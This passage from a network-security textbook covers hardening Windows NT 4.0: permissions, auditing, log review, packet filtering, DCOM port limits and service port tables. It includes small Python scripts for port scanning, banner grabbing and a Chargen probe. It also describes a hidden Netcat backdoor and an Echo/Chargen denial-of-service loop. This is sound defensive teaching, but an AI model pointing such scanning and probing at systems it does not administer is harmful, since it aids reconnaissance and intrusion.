File permissions are also set by right-clicking a directory name within Explorer and opening the Properties window. This time, however, you select the Security tab, which produces the window shown in Figure 14.14. This window has three buttons that allow you to work with file permissions, auditing, and file ownership.

Figure 14.14: The Security tab of the Shared Documents directory

The Permissions Button

File and directory permissions are modified by selecting the Permissions button from the Security tab. This produces the Directory Permissions window shown in Figure 14.15.
As you can see from this screen, working with file and directory permissions is very similar to working with share permissions. The only difference is that you have a few more options here.

Figure 14.15: The Directory Permissions window

There are two checkboxes at the top of the screen. Since you are working with a directory instead of a share, the system realizes that you may wish to apply your security changes to all objects within the directory. If only the Replace Permissions on Existing Files option is checked, the permissions are applied to files within this directory only. The Replace Permissions on Subdirectories option allows this permission change to be applied recursively to all files and directories located below the current location. If neither box is checked, the permissions are applied to the directory only, and no other directories or files are updated.

Like share permissions, file or directory permissions are set by associating a user or group with a specific level of access. When working with directory permissions, you have seven permission levels available, which allows a bit more granularity when setting access permissions. The permission settings are

No Access No access to the directory is permitted.

List The user or group may navigate the directory structure and see listed files. This setting does not provide any file access beyond seeing the file's name.

Read The user or group has List permissions, can view files, and can execute programs.

Add The user or group has List permissions and can add files and directories. Files cannot be viewed or executed.

Add & Read This setting combines the permissions of Read and Add, so files can be viewed and added but not deleted or changed.

Change The user or group has Add and Read permissions and can delete files and directories. Existing files can also be changed.

Full Control The user or group has Change permissions and can set file permissions and take ownership of files and directories.

Special Access This setting allows you to specify the exact rights assigned to files or directories. Options are Read, Write, Execute, Delete, Change Permissions, and Take Ownership. This is useful for those unique cases when the generic permission levels will not suffice. For example, setting the Execute permission for a file will allow a user to run the program without having access to view the directory.

As with share permissions, you should decide on the minimum level of access required by each user or group and set permissions accordingly.

The Auditing Button

Auditing allows you to monitor who is accessing each of the files on your server. Clicking the Auditing button in the Properties window produces the Directory Auditing window shown in Figure 14.16. From this window, you can select specific users and groups and define the activity you wish to record. For example, in Figure 14.16 we are auditing the directory for ownership and permission changes.

Figure 14.16: The Directory Auditing window

In order to use this feature, you must also launch User Manager and select Policies > Audit. Auditing must be enabled and the File and Object Access option must be selected.
All audit entries will be reported to the Security log in Event Viewer.

Note Auditing is discussed in greater detail in the "Logging" section of this chapter.

The Ownership Button

Clicking the Ownership button in the Properties window allows you to take ownership of a file or directory structure. Domain administrators are always allowed to take ownership (provided they have Full Control of the file or directory). If Full Control is enabled for domain users, they can designate other domain users who can take ownership of files or directories they own.

Logging

All NT events are reported through Event Viewer, which is accessed through the Administrative Tools program group. By default, only system and application messages are logged. You can, however, enable auditing, which provides feedback on a number of security-related events. This provides a greater level of detail about what is taking place on the system.

Configuring Event Viewer

There are a few settings within Event Viewer that you may wish to change. From the Event Viewer main menu, select Log > Log Settings. This will produce the Event Log Settings window shown in Figure 14.17. The Change Settings For drop-down menu allows you to configure the System, Application, and Security logs separately. You can also set the maximum size of each log, as well as specify what Event Viewer should do if the log grows too large.

Figure 14.17: The Event Log Settings window

Tip Given the price of disk space, the default log size setting of 512KB is far too small. Event Viewer keeps track of important events, so make sure that you provide enough space to record them. Increase the log size of all three logs to 4096KB. This will use a maximum of 12MB of disk space for log entries—a small price to pay for keeping tabs on your system's health.

The default setting for Event Log Wrapping is also a problem. What happens if you find out that your system was compromised at some time over the last 60 days? If you are overwriting events after seven days, you have no real history to go through in order to track what has happened. Change this setting to Do Not Overwrite Events for all three logs. This will produce a console error if the log file becomes full, but that is better than losing your log history.

Reviewing the Event Viewer Logs

You should plan on reviewing your logs on a regular basis. This is one of your best tools for determining whether someone has infiltrated your system. The logs show you what has gone on with your system when you were not there to watch it. Depending on your setup, you can choose from a number of manual and automated methods for reviewing log entries.

Manual Log Review

One of the simplest methods of reviewing your logs is to log on to each system from the console and review the log entries. If you have only one or two servers, this may be sufficient. Logs can be archived by selecting Log > Save As from the Event Viewer window and saving each log to a file. You may wish to save the logs as .TXT files so that they can be imported into another program, such as Excel or Access, for further review. If you will be transporting the files via floppy disk, consider compressing them first. You can easily fit 12MB worth of logs onto a floppy in PKZIP format.
If you are managing 10 or more NT systems, it may not be practical to walk around to every system. When this is the case, you can select Log > Select Computer from the Event Viewer main menu. This produces the Select Computer dialog box shown in Figure 14.18. From this screen you can select any Windows NT system and remotely view its Event Viewer log. This is extremely useful because it allows you to monitor all of your logs from a central location. It even allows you to save the logs locally, making log archiving a single-step process.

Figure 14.18: The Select Computer dialog box

Tip If your desktop system is Windows 95/98, you can still view Event Viewer log entries remotely. You simply need to acquire the NT administration tools for Windows 95/98, a self-extracting executable named nexus.exe that includes Event Viewer, User Manager, and Server Manager for Windows 95/98. All of these tools can be used to manage an NT domain from a Windows 95/98 system. The nexus.exe archive can be found on the Microsoft Web site.

Automated Log Review

If you have hundreds or thousands of NT systems to monitor, manually reviewing all of the Event Viewer logs is out of the question. If you have many systems to review, you need to automate the process. Automating the log review process allows you to search the Event Viewer logs to see if anything interesting has happened on a system. If an interesting entry is found, the log can be flagged so that the system administrator knows it is in need of further review. Automating the log review process can drastically reduce the amount of human work required to locate critical events.

The safest way to automate the review process is to transmit the log entries to a remote system. While this places log information out on the wire, it also prevents attackers from being able to modify log entries on the compromised system in order to cover their tracks. Elmar Haag has written a program that allows an NT system to forward its log entries to any UNIX system running syslogd. This consolidates the logs in a central location, where they can be reviewed by an automated process. The syslogd client can be found at www.centaur.de/~haag/logger_NT/.
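Once the entries are consolidated on a central host, flagging interesting events is a small scripting job. Here is a hypothetical sketch that counts failed logons per host in a consolidated log file; the file path, message text, and field position are assumptions, since the exact format depends on the forwarding tool in use.

# Flag hosts with repeated failed logons in a consolidated syslog file.
from collections import Counter

failures = Counter()
with open("/var/log/ntevents.log") as log:
    for line in log:
        if "Logon Failure" in line:   # match failed logon entries
            host = line.split()[3]    # assumes the host is the 4th field
            failures[host] += 1

for host, count in failures.most_common():
    if count >= 5:
        print("review %s: %d failed logons" % (host, count))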
Auditing System Events
To enable auditing, launch User Manager and select Policies > Audit. This will produce the Audit Policy window shown in Figure 14.19. For each of the listed events, you can select whether you wish to log event successes, failures, or both. A description of each event follows:

Logon and Logoff This event creates a log entry as users log on and log off the system.

File and Object Access This event creates a log entry when files or objects flagged as audited are accessed. Auditing was discussed earlier in this chapter.

Use of User Rights This event creates a log entry whenever user rights are verified. Selecting this event can create very large log files.

User and Group Management This event creates a log entry when user and group entries are added, deleted, or modified.

Security Policy Changes This event creates a log entry when security policies, such as group rights or audited events, are modified.

Restart, Shutdown, and System This event creates a log entry when the system is restarted or shut down, or when the Security log settings are changed.

Process Tracking This event tracks application and service calls. Selecting this event can create very large log files.

Figure 14.19: The Audit Policy window

Deciding What to Audit
Given the auditing choices available to you, you must now select which events you wish to monitor. The knee-jerk reaction is to monitor everything; however, this may not be practical. You need to balance the amount of detail collected against the amount of time and resources you are willing to invest in reviewing the logs. If the logs will be reviewed automatically, this may not be a problem. If you will be reviewing the logs manually, having Event Viewer generate 20MB worth of log entries on a daily basis will not help you track what is going on with your system.

The key is to track only events that you deem critical to your environment's security policy. For example, you may not wish to sift through all of the successful logon events; auditing this information may only create additional log entries for you to filter through. You should, however, be interested in logon failures, as these may be an attacker's first attempt at gaining system access.

Tip
The bottom line is to keep your log size manageable. It does absolutely no good to collect all this information if you are not going to review it to check for problems.

Security Patches
NT has suffered from a number of security vulnerabilities over the past few years. It is not uncommon to see two or three major security flaws exposed on a monthly basis. For this reason, it is important that you apply all security-related patches once they are known to be stable. Stability is usually determined within a few weeks. During this testing period, you may wish to consider testing the security patch on a nonproduction server. Microsoft has needed to recall security patches in the past due to the problems they have created.

Warning
Do not apply a new security patch to a production server until you know it will not cause a problem.

At the time of this writing, Service Pack 6a is the latest major patch release. SP6a is significant because it finally allowed NT 4.0 to be C2 certified. C2 certification is established through the National Computer Security Center (NCSC), a branch of the National Security Agency (NSA). C2 certification requires the following security features:

Mandatory user identification and authentication The ability of the system to identify authorized users and to allow only them to access system resources.

Discretionary access control Users can protect information as they see fit.

Auditing and accountability Tracking and logging of all user resource access.

Object reuse The capability of the operating system to block user access to previously utilized resources.

In order to achieve C2 certification, the NSA used these procedures:
• Examination of source code
• Examination of detailed design documentation
• Retesting to ensure that any errors identified during the evaluation have been corrected

Tip
If you will be running Internet Information Server (IIS), there are a number of other security patches you will want to install, as well. See the Microsoft Web site for the latest list of available security patches.

Available IP Services
This section lists available IP services that come with NT Server, along with a brief description of each.
Figure 14.20 shows the menu for adding more services. This menu can be accessed through the Network Properties screen. The listed services are those that ship with NT Server. The Have Disk option can be used for adding IP services created by third-party developers.

Figure 14.20: The menu for adding services to the NT Server

Computer Browser
When NetBIOS over IP is used, the computer browser creates and maintains a list of system names on the network. It also provides this list to applications running on the system, such as the Network Neighborhood. The computer browser properties allow you to add additional domains to be checked for system names.

DHCP Relay Agent
When a DHCP client and server exist on two separate network segments, the DHCP relay agent acts as a proxy between the two systems. The DHCP relay agent ensures that the client's DHCP requests are passed along to the segment where the DHCP server resides. In turn, it also ensures that the replies sent by the server make it back to the client. The benefit of a DHCP relay agent is that it removes the necessity of having a separate DHCP server on each logical network. The relay agent can be located on the same network segment as the client or at the border between the client's and the DHCP server's network segments (acting as a router).

The DHCP relay agent requires that the IP protocol be installed. It also requires the IP address of at least one DHCP server.

Microsoft DHCP Server
The DHCP server allows the NT Server to automatically provide IP address information to network clients. When a client sends out a DHCP request, it can receive all the information required to communicate on an IP network, including an IP address, subnet mask, domain name, and DNS server.

The DHCP server requires that the IP protocol be installed. When the DHCP server is installed, it automatically adds a menu option for DHCP Manager to the Administrative Tools menu.

Microsoft DNS Server
The Microsoft DNS server allows the NT Server to respond to clients and other DNS servers with IP domain name information. When the DNS server is configured to use WINS resolution, host name information is provided by WINS, based on NetBIOS system names.

A DNS server normally requires that host name information be manually maintained in a set of text files. If a machine changes its IP address, the DNS tables must be updated to reflect this change. If DHCP is used to provide IP address information, DNS has no way of knowing which host names will be assigned to which IP address.

By using WINS resolution, the DNS server can query the WINS server for host information. The DNS server passes the query along to WINS, which uses its NetBIOS table to match an IP address to a host name. The WINS server then returns this information to the DNS server. To a client querying a DNS server, the transaction is transparent: as far as the client is concerned, the DNS server is solely responsible for responding to the request. The two services do not need to be configured on the same NT Server.

The DNS server requires that the IP protocol be installed. When the DNS server is installed, it automatically adds a menu option for DNS Manager to the Administrative Tools menu.
Microsoft Internet Information Server (IIS)
The Microsoft Internet Information Server adds Web, FTP, and Gopher functionality to the NT Server. Once installed, clients can access HTML pages, transfer files via FTP, and perform Gopher searches for files. Installing Service Pack 3 will upgrade IIS to version 3.0. At the time of this writing, IIS 4.0 is the latest release for NT 4.0; to get IIS 5.0 you have to upgrade to Windows 2000.

By default, the IIS installation creates the directory InetPub and places four directories inside it. The first three are the root directories for each of the three servers. All files and directories for each of the three services are to be placed under their respective root directory. The fourth directory is for scripts. Web applications developed with CGI, WINCGI, Visual Basic, or Perl can be stored in this directory. It also contains some sample scripts and a few development tools.

Note
There have been quite a few vulnerabilities found with IIS—probably more than with the NT operating system itself. Make sure you have installed all available and stable security hotfixes. You should also review the IIS directory structure and set appropriate permission levels.

IIS requires that IP be installed. During IIS installation, a menu folder called Microsoft Internet Server is created for the management tools required for these services.

Microsoft TCP/IP Printing
Microsoft's TCP/IP printing allows an NT Server to support UNIX printing, referred to as line printer daemon (lpd). TCP/IP printing allows the NT Server to print to a print server that supports lpd, or to a UNIX system that has a directly connected printer.

IP printing also allows the NT Server to act as a printing gateway for Microsoft clients. The NT Server connects to lpd via IP and can advertise this printer as a shared resource on NetBEUI. Microsoft clients using only NetBEUI can send print jobs to this advertised share. The NT Server then forwards these jobs on to the lpd printer.

Microsoft TCP/IP printing requires that the IP protocol be installed. During installation, it adds a new printer port type called LPR, as shown in Figure 14.21. LPR is Line Printer Remote, which provides remote access to lpd printers.

Figure 14.21: Installing IP printing adds an additional printer port, called the LPR port, through which an NT server can access UNIX printers.

Network Monitor Agent
The Network Monitor Agent allows the NT Server to be remotely accessed and monitored by systems running the NT Server Network Monitoring Tools.

Network Monitor Tools and Agent
The Network Monitor Tool installs a network analyzer similar to Novell's LANalyzer or Network General's Sniffer, except that it can only capture broadcast frames or traffic traveling to and from the NT server. The Network Monitor Tool allows the server to capture and decode network frames for the purpose of analysis. Figure 14.22 shows a typical packet capture with the Network Monitor Tool. The tool displays the source and destination address of each system, as well as the protocol in use.

Figure 14.22: The Network Monitor Tool can capture network traffic so that it can be decoded and analyzed.

Warning
Network Monitor is a great tool for monitoring traffic headed to and from the server.
It can also be a major security problem if an attacker is able to access the Network Monitor data through a remote agent. Network Monitor can be a useful troubleshooting tool, but you should not leave it active unless you are using it.

RIP for Internet Protocol
The RIP for Internet Protocol service allows the NT Server to use and propagate routing information broadcasts for the IP protocol. RIP is the only dynamic routing protocol supported for IP by the base NT installation. You can, however, download a copy of RRAS from the Microsoft Web site, which adds support for the OSPF routing protocol.

RPC Configuration
The RPC Configuration service enables NT Server support for Remote Procedure Calls (RPC). RPC allows an application running on the local system to request services from another application that is running on a remote system. In order for the application to function correctly, both systems must support RPC. RPC provides functionality similar to a normal function call, except that RPC supports calling a subroutine located on a remote system.

Simple TCP/IP Services
Simple TCP/IP Services installs support for some little-used IP applications such as Echo, Chargen, and Quote of the Day.

Warning
Unless you really need these services, Simple TCP/IP should not be installed. This is because the Echo and Chargen ports can be used to launch a DoS attack against the server or even an entire network segment.

When any character is sent to the Chargen port, the service responds by returning a full set of alphanumeric characters. The Echo port is designed to reflect back all the traffic that has been transmitted to it. There is a DoS exploit that spoofs a packet in order to get two systems communicating between these two ports, or even to get a single server speaking to itself. For every character the Echo port reflects back to the Chargen port, the Chargen port responds with a full set of alphanumeric characters. The result is that network utilization can reach 100 percent, preventing legitimate traffic from reaching its destination.
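You can observe Chargen's chattiness for yourself with a simple test, which also tells you whether the Simple TCP/IP Services are still enabled on a server. The sketch below, a minimal check rather than an attack tool, connects to TCP port 19 on a host of your choosing (the address is a placeholder) and prints the first chunk of data the service volunteers unprompted.

# chargen_check.py -- sample the output of a Chargen service (TCP port 19).
import socket

HOST = "192.168.1.10"   # placeholder -- a server you suspect runs Simple TCP/IP Services

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((HOST, 19))        # fails if the service is not installed
data = sock.recv(512)           # Chargen streams characters unprompted
sock.close()
print(data.decode("ascii", "replace"))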
SNMP Service
The SNMP service allows the NT Server to be monitored by an SNMP management station. It also allows the performance monitor on the NT Server to monitor IP statistics, as well as statistics for IP applications (DNS, WINS, and so on).

When the SNMP service is installed, the NT Server can send configuration and performance information to an SNMP management station such as Hewlett-Packard's HP OpenView. This allows the status of the NT Server, as well as other SNMP devices, to be monitored from a central location. Monitoring can be performed over the IP or IPX protocol.

The SNMP service also adds functionality to the NT Performance Monitor. For example, it allows you to monitor the number of IP packets with errors or the number of WINS queries the server has received. Both SNMP and the applicable service must be installed for these features to be added to Performance Monitor.

Windows Internet Name Service (WINS)
A WINS server allows NetBIOS systems to communicate across a router using IP encapsulation of NetBIOS. The WINS server acts as a NetBIOS Name Server (NBNS) for p-node and h-node systems located on the NT Server's local subnet. WINS stores each system's NetBIOS name, as well as its IP address.

Each WINS server on the network periodically updates the other WINS servers with a copy of its table. The result is a dynamic list, mapping NetBIOS names to IP addresses for every system on the network. A copy of the list is then stored on each WINS server.

When a p-node system needs the address of another NetBIOS system, it sends a discovery packet to its local WINS server. If the system in question happens to be located on a remote subnet, the WINS server returns the remote system's IP address. This allows the remote system to be discovered without propagating broadcast frames throughout the network. When h-nodes are used, the functionality is identical, except that an h-node can fall back on broadcast discovery if the WINS server does not have an entry for a specific host.

WINS requires that the IP protocol be installed. During WINS installation, a menu option for WINS Manager is added to the Administrative Tools menu.

Packet Filtering with Windows NT
Windows NT supports static packet filtering of IP traffic. While the capabilities of this filtering are somewhat rudimentary, they can be useful for providing some additional security. Since NT uses static packet filters, it is not capable of maintaining state. This means that NT's filters are unable to distinguish between legitimate acknowledgment traffic and possible attacks.

Note
See Chapter 5 for an in-depth discussion of static packet filtering versus dynamic packet filtering.

Windows NT does not allow you to specify the direction of traffic when applying your packet filters. All filtering is done on inbound SYN=1 traffic only. This means that if someone is able to compromise your system, NT's packet filters will be unable to prevent the attacker from relaying information off the system. Finally, NT does not allow you to filter on IP address. This means that any access control policy you create will be applied to all systems equally. In other words, you could not create an access control policy that allows access only from a specific subnet.

Enabling Packet Filtering
To enable packet filtering, go to Network Properties > Protocols and double-click the TCP/IP protocol. This will produce the Microsoft TCP/IP Properties screen. With the IP Address tab selected, click the Advanced button located at the bottom right side of the window. This will produce the Advanced IP Addressing screen shown in Figure 14.23.

Figure 14.23: The Advanced IP Addressing screen

From the Advanced IP Addressing screen, click Enable Security so that the box is checked. This will activate the Configure button located just below it. Clicking the Configure button will produce the TCP/IP Security screen shown in Figure 14.24. The TCP/IP Security screen is used to configure all packet filtering access control policies that will be implemented on the system.

Figure 14.24: The TCP/IP Security screen

Configuring Packet Filtering
The topmost field on the TCP/IP Security screen is labeled Adapter. This allows you to scroll through all the network adapter cards installed in the system, so that you can assign a different access control policy to each one.
This is useful if you have a multi-homed server that connects to two different subnets and you wish to provide different services to each. For example, you could leave all services enabled on one network card while limiting hosts on the other subnet to accessing only HTTP (TCP port 80).

The TCP/IP Security screen also lets you define which services can be accessed through the selected network card. For example, in Figure 14.24 we have specified that all users located off the DEC PCI network card should only be allowed access to services on TCP port 80. This access rule applies to the subnet directly connected to the DEC PCI card, as well as any other subnets that may be sitting behind this one on the other side of another router.

To understand the effects of the packet filter setting, take a look at Figure 14.25. This figure is the result of an IP port scan performed on an NT Server. Notice that the scan has detected a number of open ports on this server.

Figure 14.25: A port scan performed against an unprotected NT Server

Figure 14.26 is a port scan of the same NT Server after it has been configured with the access control policy shown in Figure 14.24. Notice that the only port still responding to service requests is port 80 (HTTP). If this were a multi-homed system, we could continue to offer all services off another network card, while hosts connecting through this network would only have access to Web services.

Figure 14.26: A port scan performed against an NT Server using packet filtering

Returning to the TCP/IP Security screen shown in Figure 14.24, you have three different options for controlling IP traffic. The first box, labeled TCP Ports, allows you to specify which inbound ports should be active on the system. You can choose Permit All, which will allow all TCP traffic, or you can choose Permit Only, which allows you to specify inbound access to only certain ports. To add a new port, simply click the Add button and type in the number of the port you wish to leave open. These filter settings will only affect TCP packets with the flag setting SYN=1. If traffic is received for a specific port but the SYN flag is not set, the packet filters will not block the traffic.

Note
Remember that NT's packet filters only filter in an inbound direction. This means that you are not required to open upper port numbers in order to allow acknowledgments back to the requesting host.

Along with filtering TCP traffic, NT's packet filters allow you to filter UDP, as well. Remember that NT's packet filters are static, not dynamic. This means that NT may not be as effective at filtering UDP traffic as a real firewall: with TCP traffic, NT can make filtering decisions based on the value of the SYN flag, but since UDP does not use flags, this is not an option. Finally, the TCP/IP Security screen also allows you to filter traffic based on transport. Within the IP Protocols box, you can click the Add button and specify only certain transports by name.

Once you have configured your packet filter settings, click the OK button on each of the four open screens. You will need to reboot the system for your filters to take effect.
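After the reboot, it is worth producing your own before-and-after comparison in the spirit of Figures 14.25 and 14.26. A dedicated scanner will be more thorough, but as a rough check the sketch below simply attempts a TCP connection to each port in a range and reports which ones answer; the target address is a placeholder.

# filter_check.py -- report which TCP ports on a host still accept connections.
import socket

HOST = "192.168.1.10"   # placeholder -- the NT server whose filters you are testing

for port in range(1, 1025):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(0.5)
    try:
        sock.connect((HOST, port))   # only completes if SYN=1 passes the filters
        print("port %d open" % port)
    except (socket.timeout, OSError):
        pass                         # filtered, closed, or unreachable
    finally:
        sock.close()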
A Final Word on NT Ports
NT does not report conflicts caused by two or more applications acting on a specific port. This means that any ports that are blocked by the packet filters will not produce an error message in Event Viewer. It also means that you need to inspect your system very carefully in order to identify which services are running.

For example, review the port scan we performed in Figure 14.25. The server appears to be running the following services:
• WINS (port 42)
• RPC (port 135)
• NetBIOS over IP (port 139)
• Internet Information Server (IIS)

IIS includes port 21 for FTP, port 70 for Gopher, and port 80 for HTTP. In other words, this looks like a normal NT Server. There is nothing in this port scan that would raise a network administrator's suspicions.

The fact is, this server is hiding a surprise. If you telnet to port 70 of this system, you are presented with a command prompt, as shown in Figure 14.27. You are not prompted for a password, and you are able to gain immediate access to the file system. Obviously, this is not the type of response you would expect from a Gopher server.

Figure 14.27: A command session with what appears to be a normal NT Server

How did this happen? The NT Server in question is running a copy of L0pht's Netcat for NT. Netcat is an all-purpose utility that can act as a client as well as a server. It also has the ability to bind itself over another service listening on the same port number. Thus Netcat is able to accept and process inbound service requests before the Gopher service is able to detect the traffic. This means that the network administrator would have to actually attempt a connection with every active port in order to ensure that the correct service is listening.

Since NT does not report conflicts between multiple applications that attempt to bind to the same listening port, Netcat produces no telltale error messages. In fact, it is even possible to launch Netcat so that it listens for inbound service requests on a port that is supposed to be blocked by your packet filter policy. In other words, it is possible to have applications accept inbound connection requests before the request is subjected to the filters. Again, this type of activity generates no error log messages.

Tip
The moral of this story is that even if you think you have locked a system down tight, it is always a good idea to perform a system review on a regular basis. This review should include a check of which processes are running in memory, as well as what type of response you receive when connecting to each of the active ports.
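That last check can be scripted, too. The sketch below connects to a list of active ports, sends a bare carriage return, and prints whatever greeting comes back; a "Gopher" port that answers like a command shell, as in Figure 14.27, stands out immediately. The host address and port list are placeholders to be replaced with your own scan results.

# banner_check.py -- print the greeting returned by each listening service.
import socket

HOST = "192.168.1.10"               # placeholder
PORTS = [21, 42, 70, 80, 135, 139]  # placeholder -- ports your scan found open

for port in PORTS:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(3)
    try:
        sock.connect((HOST, port))
        sock.sendall(b"\r\n")
        print("port %d: %r" % (port, sock.recv(256)))
    except (socket.timeout, OSError) as err:
        print("port %d: no banner (%s)" % (port, err))
    finally:
        sock.close()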
Securing DCOM
The Distributed Component Object Model (DCOM) is an object-oriented approach to making Remote Procedure Calls (RPC); thus DCOM is sometimes referred to as Object RPC. DCOM is designed to replace Microsoft's original specification, called Object Linking and Embedding (OLE) remote automation. The benefit of DCOM over OLE is that DCOM is designed to support multiple flavors of operating systems.

A DCOM client will initially connect to the DCOM server using a fixed port number of UDP 135 (NT RPC). The DCOM server then assigns the ports it will use dynamically. This makes DCOM applications such as NetMeeting and Exchange extremely difficult to support if client traffic must pass through a firewall. Unlike most applications, which would only require you to open a single port (such as SMTP, which uses TCP port 25), DCOM requires that all ports above 1023 be left open. Depending on which Windows platforms you are using, you may need to open ports for TCP, UDP, or both. Obviously, this makes supporting any DCOM application across a firewall a severe security threat.

Selecting the DCOM Transport
There is an excellent paper written by Michael Nelson located at www.microsoft.com/com/wpaper/dcomfw.asp. This article discusses how to go about limiting the range of ports used by DCOM applications. In short, the article mentions that all Windows operating systems default to TCP as the DCOM transport, except for Windows NT version 4.0.

Tip
One of the best ways to begin limiting the number of ports used by DCOM is to ensure that all of your systems are using the same transport.

To change your NT 4.0 systems to use TCP as their default DCOM transport, launch regedt32 and find the following key:

HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc

This will produce the Registry Editor screen shown in Figure 14.28. The left pane shows the hive objects we needed to navigate in order to find this specific key. The right pane shows the actual key value. This key defines the protocol search order to be used by DCOM. Notice that the first protocol that DCOM is set to use is UDP/IP, which is defined by the ncadg_ip_udp key value.

Figure 14.28: Using Registry Editor to change the DCOM default protocol

Once you locate this key, double-click the values in the right pane. This will produce the Multi-String Editor window shown in Figure 14.29. From top to bottom, each line defines the protocol search order for DCOM to use. For example, if DCOM attempts to connect to a remote system using UDP/IP and that connection fails, this window defines that DCOM should then attempt a connection using IPX.

Figure 14.29: The Multi-String Editor showing DCOM's protocol search order

To change the default search order so that TCP/IP connections are attempted first, use Cut and Paste to move ncacn_ip_tcp from being the third listed item to being the first. Once this is complete, click the OK button and exit Registry Editor. You will need to reboot the system for your changes to take effect.

Tip
Since the Multi-String Editor does not have an Edit menu option, you must use Ctrl+X to cut the highlighted text string and Ctrl+V to paste it.
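If you have many NT 4.0 systems to change, the same edit can be scripted. The sketch below uses Python's winreg module to move ncacn_ip_tcp to the front of the search order; it assumes the multi-string value under the Rpc key is the one named DCOM Protocols, so confirm the value name in regedt32 on your own systems before running it.

# dcom_tcp_first.py -- put TCP/IP first in DCOM's protocol search order.
# Assumes the REG_MULTI_SZ value is named "DCOM Protocols"; verify first.
# Requires administrative rights; reboot for the change to take effect.
import winreg

key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Software\Microsoft\Rpc",
                     0, winreg.KEY_READ | winreg.KEY_SET_VALUE)
protocols, _ = winreg.QueryValueEx(key, "DCOM Protocols")
if "ncacn_ip_tcp" in protocols:
    protocols.remove("ncacn_ip_tcp")
protocols.insert(0, "ncacn_ip_tcp")      # TCP/IP is now tried first
winreg.SetValueEx(key, "DCOM Protocols", 0, winreg.REG_MULTI_SZ, protocols)
winreg.CloseKey(key)
print("New search order:", protocols)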
Limiting the Ports Used by DCOM
Nelson's paper also describes how to limit the range of ports used by DCOM, forcing DCOM applications to use only the ports you specify. This eases the burden of supporting DCOM through a packet filter or a firewall by limiting the ports used to a select few—rather than all ports above 1023.

Note
This does not limit which applications try to use DCOM; it simply limits the ports used by DCOM itself.

To define the ports used by DCOM, launch regedt32 and go back to the key you were editing in the last section of this chapter:

HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc

With this key highlighted, select Edit > Add Key from the Registry Editor menu. This will produce the Add Key dialog box. In the Key Name field, type in the name Internet and click OK. You should now see a key named Internet appear below Rpc. Click the Internet object so that the entry becomes highlighted.

Table 14.1 shows the values that you will need to add to this key. Values are added by selecting Edit > Add Value from the Registry Editor menu. When the Add Value window appears, you need to enter the value name and data type. Clicking the OK button will produce the String Editor. In the String Editor window, enter the string value shown in Table 14.1.

Table 14.1: Required Key Changes to Make DCOM Use Fixed Port Numbers

Value Name                Data Type       String Value
Ports                     REG_MULTI_SZ    57100-57120
                                          57131
PortsInternetAvailable    REG_SZ          Y
UseInternetPorts          REG_SZ          Y

The Ports string value defines which ports may be used by DCOM. Each line may specify a specific port number or a range. For example, in Table 14.1 ports 57100–57120 have been defined as ports that DCOM can use. An additional port, 57131, has also been defined. If you will be supporting DCOM through a firewall, the string values you associate with the Ports key are the inbound port numbers you will need to open from the Internet to your server.

Note
When assigning DCOM ports, it is a good idea never to statically assign the ports 1–49151, as these may be in use by another service or may be dynamically assigned by the system before the DCOM application is activated. When statically assigning ports, use only private port numbers, which range from 49152 through 65535. For more information, see: ftp://ftp.isi.edu/in-notes/iana/assignments/port-numbers.
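These values can also be written from a script. The sketch below uses Python's winreg module to create the Internet key and the three values from Table 14.1 (the port range shown is the table's example; the note above suggests choosing from 49152–65535 in practice). It requires administrative rights, and a reboot afterward.

# dcom_ports.py -- restrict DCOM to fixed port numbers (see Table 14.1).
# Requires administrative rights; reboot for the change to take effect.
import winreg

internet = winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
                            r"Software\Microsoft\Rpc\Internet")
winreg.SetValueEx(internet, "Ports", 0, winreg.REG_MULTI_SZ,
                  ["57100-57120", "57131"])   # one port or range per line
winreg.SetValueEx(internet, "PortsInternetAvailable", 0, winreg.REG_SZ, "Y")
winreg.SetValueEx(internet, "UseInternetPorts", 0, winreg.REG_SZ, "Y")
winreg.CloseKey(internet)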
DCOM and NAT
One of the caveats about DCOM is that raw IP address information is passed between systems. This means that network address translation cannot be used. NAT is typically used to translate private IP address space into legal IP address space for the purpose of communicating on the Internet. If the DCOM server is sitting behind a device performing NAT, DCOM will not work, because the client will attempt to reach the system using the IP address information embedded in the data stream. If you need to support DCOM applications over the Internet, you cannot use NAT to translate IP address information.

Tip
You can use DCOM applications across the Internet using private address space if the data stream will be traveling along a VPN tunnel. This is because a tunnel supports the use of private address space without performing NAT. See Chapter 10 for more details.

Ports Used by Windows Services
Microsoft uses a number of ports and services that are unique to the NT operating system. While the port numbers used by services such as SMTP, FTP, and HTTP are documented in Request For Comment (RFC) 1700, many of the ports used for Windows-specific services, such as WINS or remote event viewing, are not as well documented. This can make supporting Microsoft services extremely difficult across subnets where firewalls or packet filters are being used. Table 14.2 lists a number of common Windows services along with the transport and port numbers they use.

Table 14.2: Transport and Port Numbers for Common Windows Services

Name                        Transport/Port Number
b-node browsing             UDP/137, UDP/138
p-node WINS registration    TCP/139
p-node WINS query           TCP/139
WINS replication            TCP/42
Logon                       UDP/137, UDP/138, TCP/139
File share access           TCP/139
Printer share access        TCP/139
Event Viewer                TCP/139
Server Manager              TCP/139
User Manager                TCP/139
Performance Monitor         TCP/139
Registry Editor             TCP/139

Note
Keep in mind that in some cases you may need to open more than just the port number listed in Table 14.2. For example, Event Viewer needs to know the IP address used by the remote NT system. If you are not using a local LMHOSTS file, you may need to enable the ports used by WINS, as well.

Table 14.3 lists a number of Windows applications that rely on DCOM. This means that the service will use one or more fixed ports, as well as random ports above 1023, unless you have made the Registry changes documented in the last section. Also, RPC 135 will default to UDP (as shown in the table below) unless you have modified the Registry to use TCP.

Table 14.3: Windows Applications That Use DCOM

Name                    Transport/Port Number
Domain Trusts           UDP/135, UDP/137, UDP/138, TCP/139
DHCP Manager            UDP/135
WINS Manager            UDP/135
Message Queue           UDP/135, TCP&UDP/1801, TCP/2101, TCP/2103, TCP/2105
Exchange Client         UDP/135
Exchange replication    UDP/135

Note
There are a number of additional Registry key changes you must make to an Exchange server in order to support client communications through a firewall. For more information, see Microsoft's Knowledgebase articles Q148732 and Q155831.

Additional Registry Key Changes
A review of Microsoft's Web site reveals a number of other Registry keys that may be modified in order to enhance security. All key entries should be changed using the regedt32 utility. The older regedit utility does not have some of the advanced functionality of regedt32, such as support for multi-part keys.

Note
As mentioned earlier in this chapter, make sure you generate an emergency recovery disk before attempting to edit the Registry.

